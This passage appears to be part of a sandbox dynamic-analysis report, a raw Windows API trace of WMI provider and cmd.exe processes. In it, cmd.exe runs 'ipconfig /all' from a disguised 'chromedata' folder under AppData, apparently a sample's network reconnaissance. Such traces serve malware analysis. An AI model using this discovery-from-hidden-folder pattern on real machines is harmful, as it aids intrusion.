	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28ed10 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28f528 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28fd40 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x290558 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x290d70 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x291588 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x291da0 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2925b8 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x292dd0 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2935e8 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x293e00 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x294618 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x294e30 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x295648 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28d6f0 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2bf200 | out: hHeap=0x270000) returned 1
	[0256.608] CoUninitialize () 
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2c5940 | out: hHeap=0x270000) returned 1
	[0256.608] RtlExitUserThread (Status=0x0) 

Thread:
	id = 236
	os_tid = 0x31c


Thread:
	id = 237
	os_tid = 0x660


Thread:
	id = 238
	os_tid = 0xb90


Thread:
	id = 239
	os_tid = 0xc00


Thread:
	id = 374
	os_tid = 0x5d0


Thread:
	id = 375
	os_tid = 0xf4c


Thread:
	id = 376
	os_tid = 0xf48


Process:
	id = "41"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x7ee171e0"
	os_pid = "0x270"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "25"
	os_parent_pid = "0x34c"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 240
	os_tid = 0x938


Thread:
	id = 241
	os_tid = 0xc0


Thread:
	id = 242
	os_tid = 0x320


Thread:
	id = 243
	os_tid = 0x584


Thread:
	id = 244
	os_tid = 0x574


Thread:
	id = 245
	os_tid = 0x6e4


Process:
	id = "42"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x7ee17640"
	os_pid = "0xc20"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "25"
	os_parent_pid = "0x34c"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006e37d" [0xc000000f]


Thread:
	id = 252
	os_tid = 0xc10


Thread:
	id = 253
	os_tid = 0xc34


Thread:
	id = 254
	os_tid = 0xc28


Thread:
	id = 255
	os_tid = 0xc0c


Thread:
	id = 256
	os_tid = 0xc1c


Thread:
	id = 257
	os_tid = 0xc2c


Thread:
	id = 258
	os_tid = 0xc30


Thread:
	id = 259
	os_tid = 0xc14


Thread:
	id = 260
	os_tid = 0x5b0


Process:
	id = "43"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee173e0"
	os_pid = "0x3ec"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c ipconfig /all"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 262
	os_tid = 0x208

	[0218.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f830 | out: lpSystemTimeAsFileTime=0x18f830*(dwLowDateTime=0x6a542440, dwHighDateTime=0x1d50a6a)) 
	[0218.346] GetCurrentProcessId () returned 0x3ec
	[0218.346] GetCurrentThreadId () returned 0x208
	[0218.346] GetTickCount () returned 0xa8cec6
	[0218.346] QueryPerformanceCounter (in: lpPerformanceCount=0x18f828 | out: lpPerformanceCount=0x18f828*=29218372871) returned 1
	[0218.347] GetModuleHandleA (lpModuleName=0x0) returned 0x4a590000
	[0218.347] __set_app_type (_Type=0x1) 
	[0218.347] __p__fmode () returned 0x770231f4
	[0218.347] __p__commode () returned 0x770231fc
	[0218.347] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5b21a6) returned 0x0
	[0218.347] __getmainargs (in: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c, _DoWildCard=0, _StartInfo=0x4a5b4140 | out: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c) returned 0
	[0218.347] GetCurrentThreadId () returned 0x208
	[0218.347] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x208) returned 0x38
	[0218.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0218.348] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0218.348] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0218.348] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0218.348] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f7c0 | out: phkResult=0x18f7c0*=0x0) returned 0x2
	[0218.348] VirtualQuery (in: lpAddress=0x18f7f7, lpBuffer=0x18f790, dwLength=0x1c | out: lpBuffer=0x18f790*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0218.348] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f790, dwLength=0x1c | out: lpBuffer=0x18f790*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0218.348] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f790, dwLength=0x1c | out: lpBuffer=0x18f790*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0218.348] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f790, dwLength=0x1c | out: lpBuffer=0x18f790*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0218.348] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f790, dwLength=0x1c | out: lpBuffer=0x18f790*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c
	[0218.348] GetConsoleOutputCP () returned 0x1b5
	[0218.348] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1
	[0218.349] SetConsoleCtrlHandler (HandlerRoutine=0x4a5ae72a, Add=1) returned 1
	[0218.349] _get_osfhandle (_FileHandle=1) returned 0x150
	[0218.349] SetConsoleMode (hConsoleHandle=0x150, dwMode=0x0) returned 0
	[0218.349] _get_osfhandle (_FileHandle=1) returned 0x150
	[0218.349] GetConsoleMode (in: hConsoleHandle=0x150, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 0
	[0218.349] _get_osfhandle (_FileHandle=0) returned 0x154
	[0218.349] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 0
	[0218.349] GetEnvironmentStringsW () returned 0x2001f8*
	[0218.349] GetProcessHeap () returned 0x1f0000
	[0218.349] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x8fa) returned 0x200b00
	[0218.349] FreeEnvironmentStringsW (penv=0x2001f8) returned 1
	[0218.350] GetProcessHeap () returned 0x1f0000
	[0218.350] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4) returned 0x1ffaf8
	[0218.350] GetEnvironmentStringsW () returned 0x2001f8*
	[0218.350] GetProcessHeap () returned 0x1f0000
	[0218.350] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x8fa) returned 0x201408
	[0218.350] FreeEnvironmentStringsW (penv=0x2001f8) returned 1
	[0218.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e730 | out: phkResult=0x18e730*=0x40) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x88, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x1, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x1, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x0, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x40, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x40, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x40, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.350] RegCloseKey (hKey=0x40) returned 0x0
	[0218.350] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e730 | out: phkResult=0x18e730*=0x40) returned 0x0
	[0218.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x40, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x1, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x1, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x0, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x9, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x4, lpData=0x18e73c*=0x9, lpcbData=0x18e734*=0x4) returned 0x0
	[0218.351] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e738, lpData=0x18e73c, lpcbData=0x18e734*=0x1000 | out: lpType=0x18e738*=0x0, lpData=0x18e73c*=0x9, lpcbData=0x18e734*=0x1000) returned 0x2
	[0218.351] RegCloseKey (hKey=0x40) returned 0x0
	[0218.351] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadfd8
	[0218.351] srand (_Seed=0x5cdadfd8) 
	[0218.351] GetCommandLineW () returned="/c ipconfig /all"
	[0218.351] GetCommandLineW () returned="/c ipconfig /all"
	[0218.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0218.352] GetProcessHeap () returned 0x1f0000
	[0218.352] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x210) returned 0x201d10
	[0218.352] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201d18, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0218.352] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0218.352] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0218.352] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0218.352] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0218.352] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0218.353] GetProcessHeap () returned 0x1f0000
	[0218.353] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x200b00 | out: hHeap=0x1f0000) returned 1
	[0218.353] GetEnvironmentStringsW () returned 0x2001f8*
	[0218.353] GetProcessHeap () returned 0x1f0000
	[0218.353] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x912) returned 0x202848
	[0218.353] FreeEnvironmentStringsW (penv=0x2001f8) returned 1
	[0218.353] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0218.353] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0218.353] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0218.353] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0218.353] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0218.353] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0218.353] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0218.353] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0218.353] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0218.353] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0218.353] GetProcessHeap () returned 0x1f0000
	[0218.353] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x6a) returned 0x1f07f0
	[0218.353] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f4fc | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0218.355] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x18f4fc, lpFilePart=0x18f4f8 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x18f4f8*="chromedata") returned 0x30
	[0218.355] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0218.355] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f278 | out: lpFindFileData=0x18f278*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x200078
	[0218.356] FindClose (in: hFindFile=0x200078 | out: hFindFile=0x200078) returned 1
	[0218.356] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x18f278 | out: lpFindFileData=0x18f278*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x200078
	[0218.356] FindClose (in: hFindFile=0x200078 | out: hFindFile=0x200078) returned 1
	[0218.356] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0218.356] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x18f278 | out: lpFindFileData=0x18f278*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x200078
	[0218.356] FindClose (in: hFindFile=0x200078 | out: hFindFile=0x200078) returned 1
	[0218.356] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x18f278 | out: lpFindFileData=0x18f278*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x200078
	[0218.356] FindClose (in: hFindFile=0x200078 | out: hFindFile=0x200078) returned 1
	[0218.357] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x18f278 | out: lpFindFileData=0x18f278*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x26d76880, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x26d76880, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x200078
	[0218.357] FindClose (in: hFindFile=0x200078 | out: hFindFile=0x200078) returned 1
	[0218.357] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0218.357] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0218.357] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0218.357] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0218.357] GetProcessHeap () returned 0x1f0000
	[0218.357] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x202848 | out: hHeap=0x1f0000) returned 1
	[0218.357] GetEnvironmentStringsW () returned 0x2001f8*
	[0218.357] GetProcessHeap () returned 0x1f0000
	[0218.357] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x97c) returned 0x201f28
	[0218.357] FreeEnvironmentStringsW (penv=0x2001f8) returned 1
	[0218.357] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0218.357] GetProcessHeap () returned 0x1f0000
	[0218.357] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x1f07f0 | out: hHeap=0x1f0000) returned 1
	[0218.357] GetProcessHeap () returned 0x1f0000
	[0218.357] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x400e) returned 0x203af0
	[0218.358] GetProcessHeap () returned 0x1f0000
	[0218.358] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x28) returned 0x200078
	[0218.358] GetProcessHeap () returned 0x1f0000
	[0218.358] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x203af0 | out: hHeap=0x1f0000) returned 1
	[0218.358] GetConsoleOutputCP () returned 0x1b5
	[0218.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1
	[0218.358] GetUserDefaultLCID () returned 0x409
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5b4950, cchData=8 | out: lpLCData=":") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f63c, cchData=128 | out: lpLCData="0") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f63c, cchData=128 | out: lpLCData="0") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f63c, cchData=128 | out: lpLCData="1") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5b4940, cchData=8 | out: lpLCData="/") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5b4d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5b4d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5b4d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5b4cc0, cchData=32 | out: lpLCData="Thu") returned 4
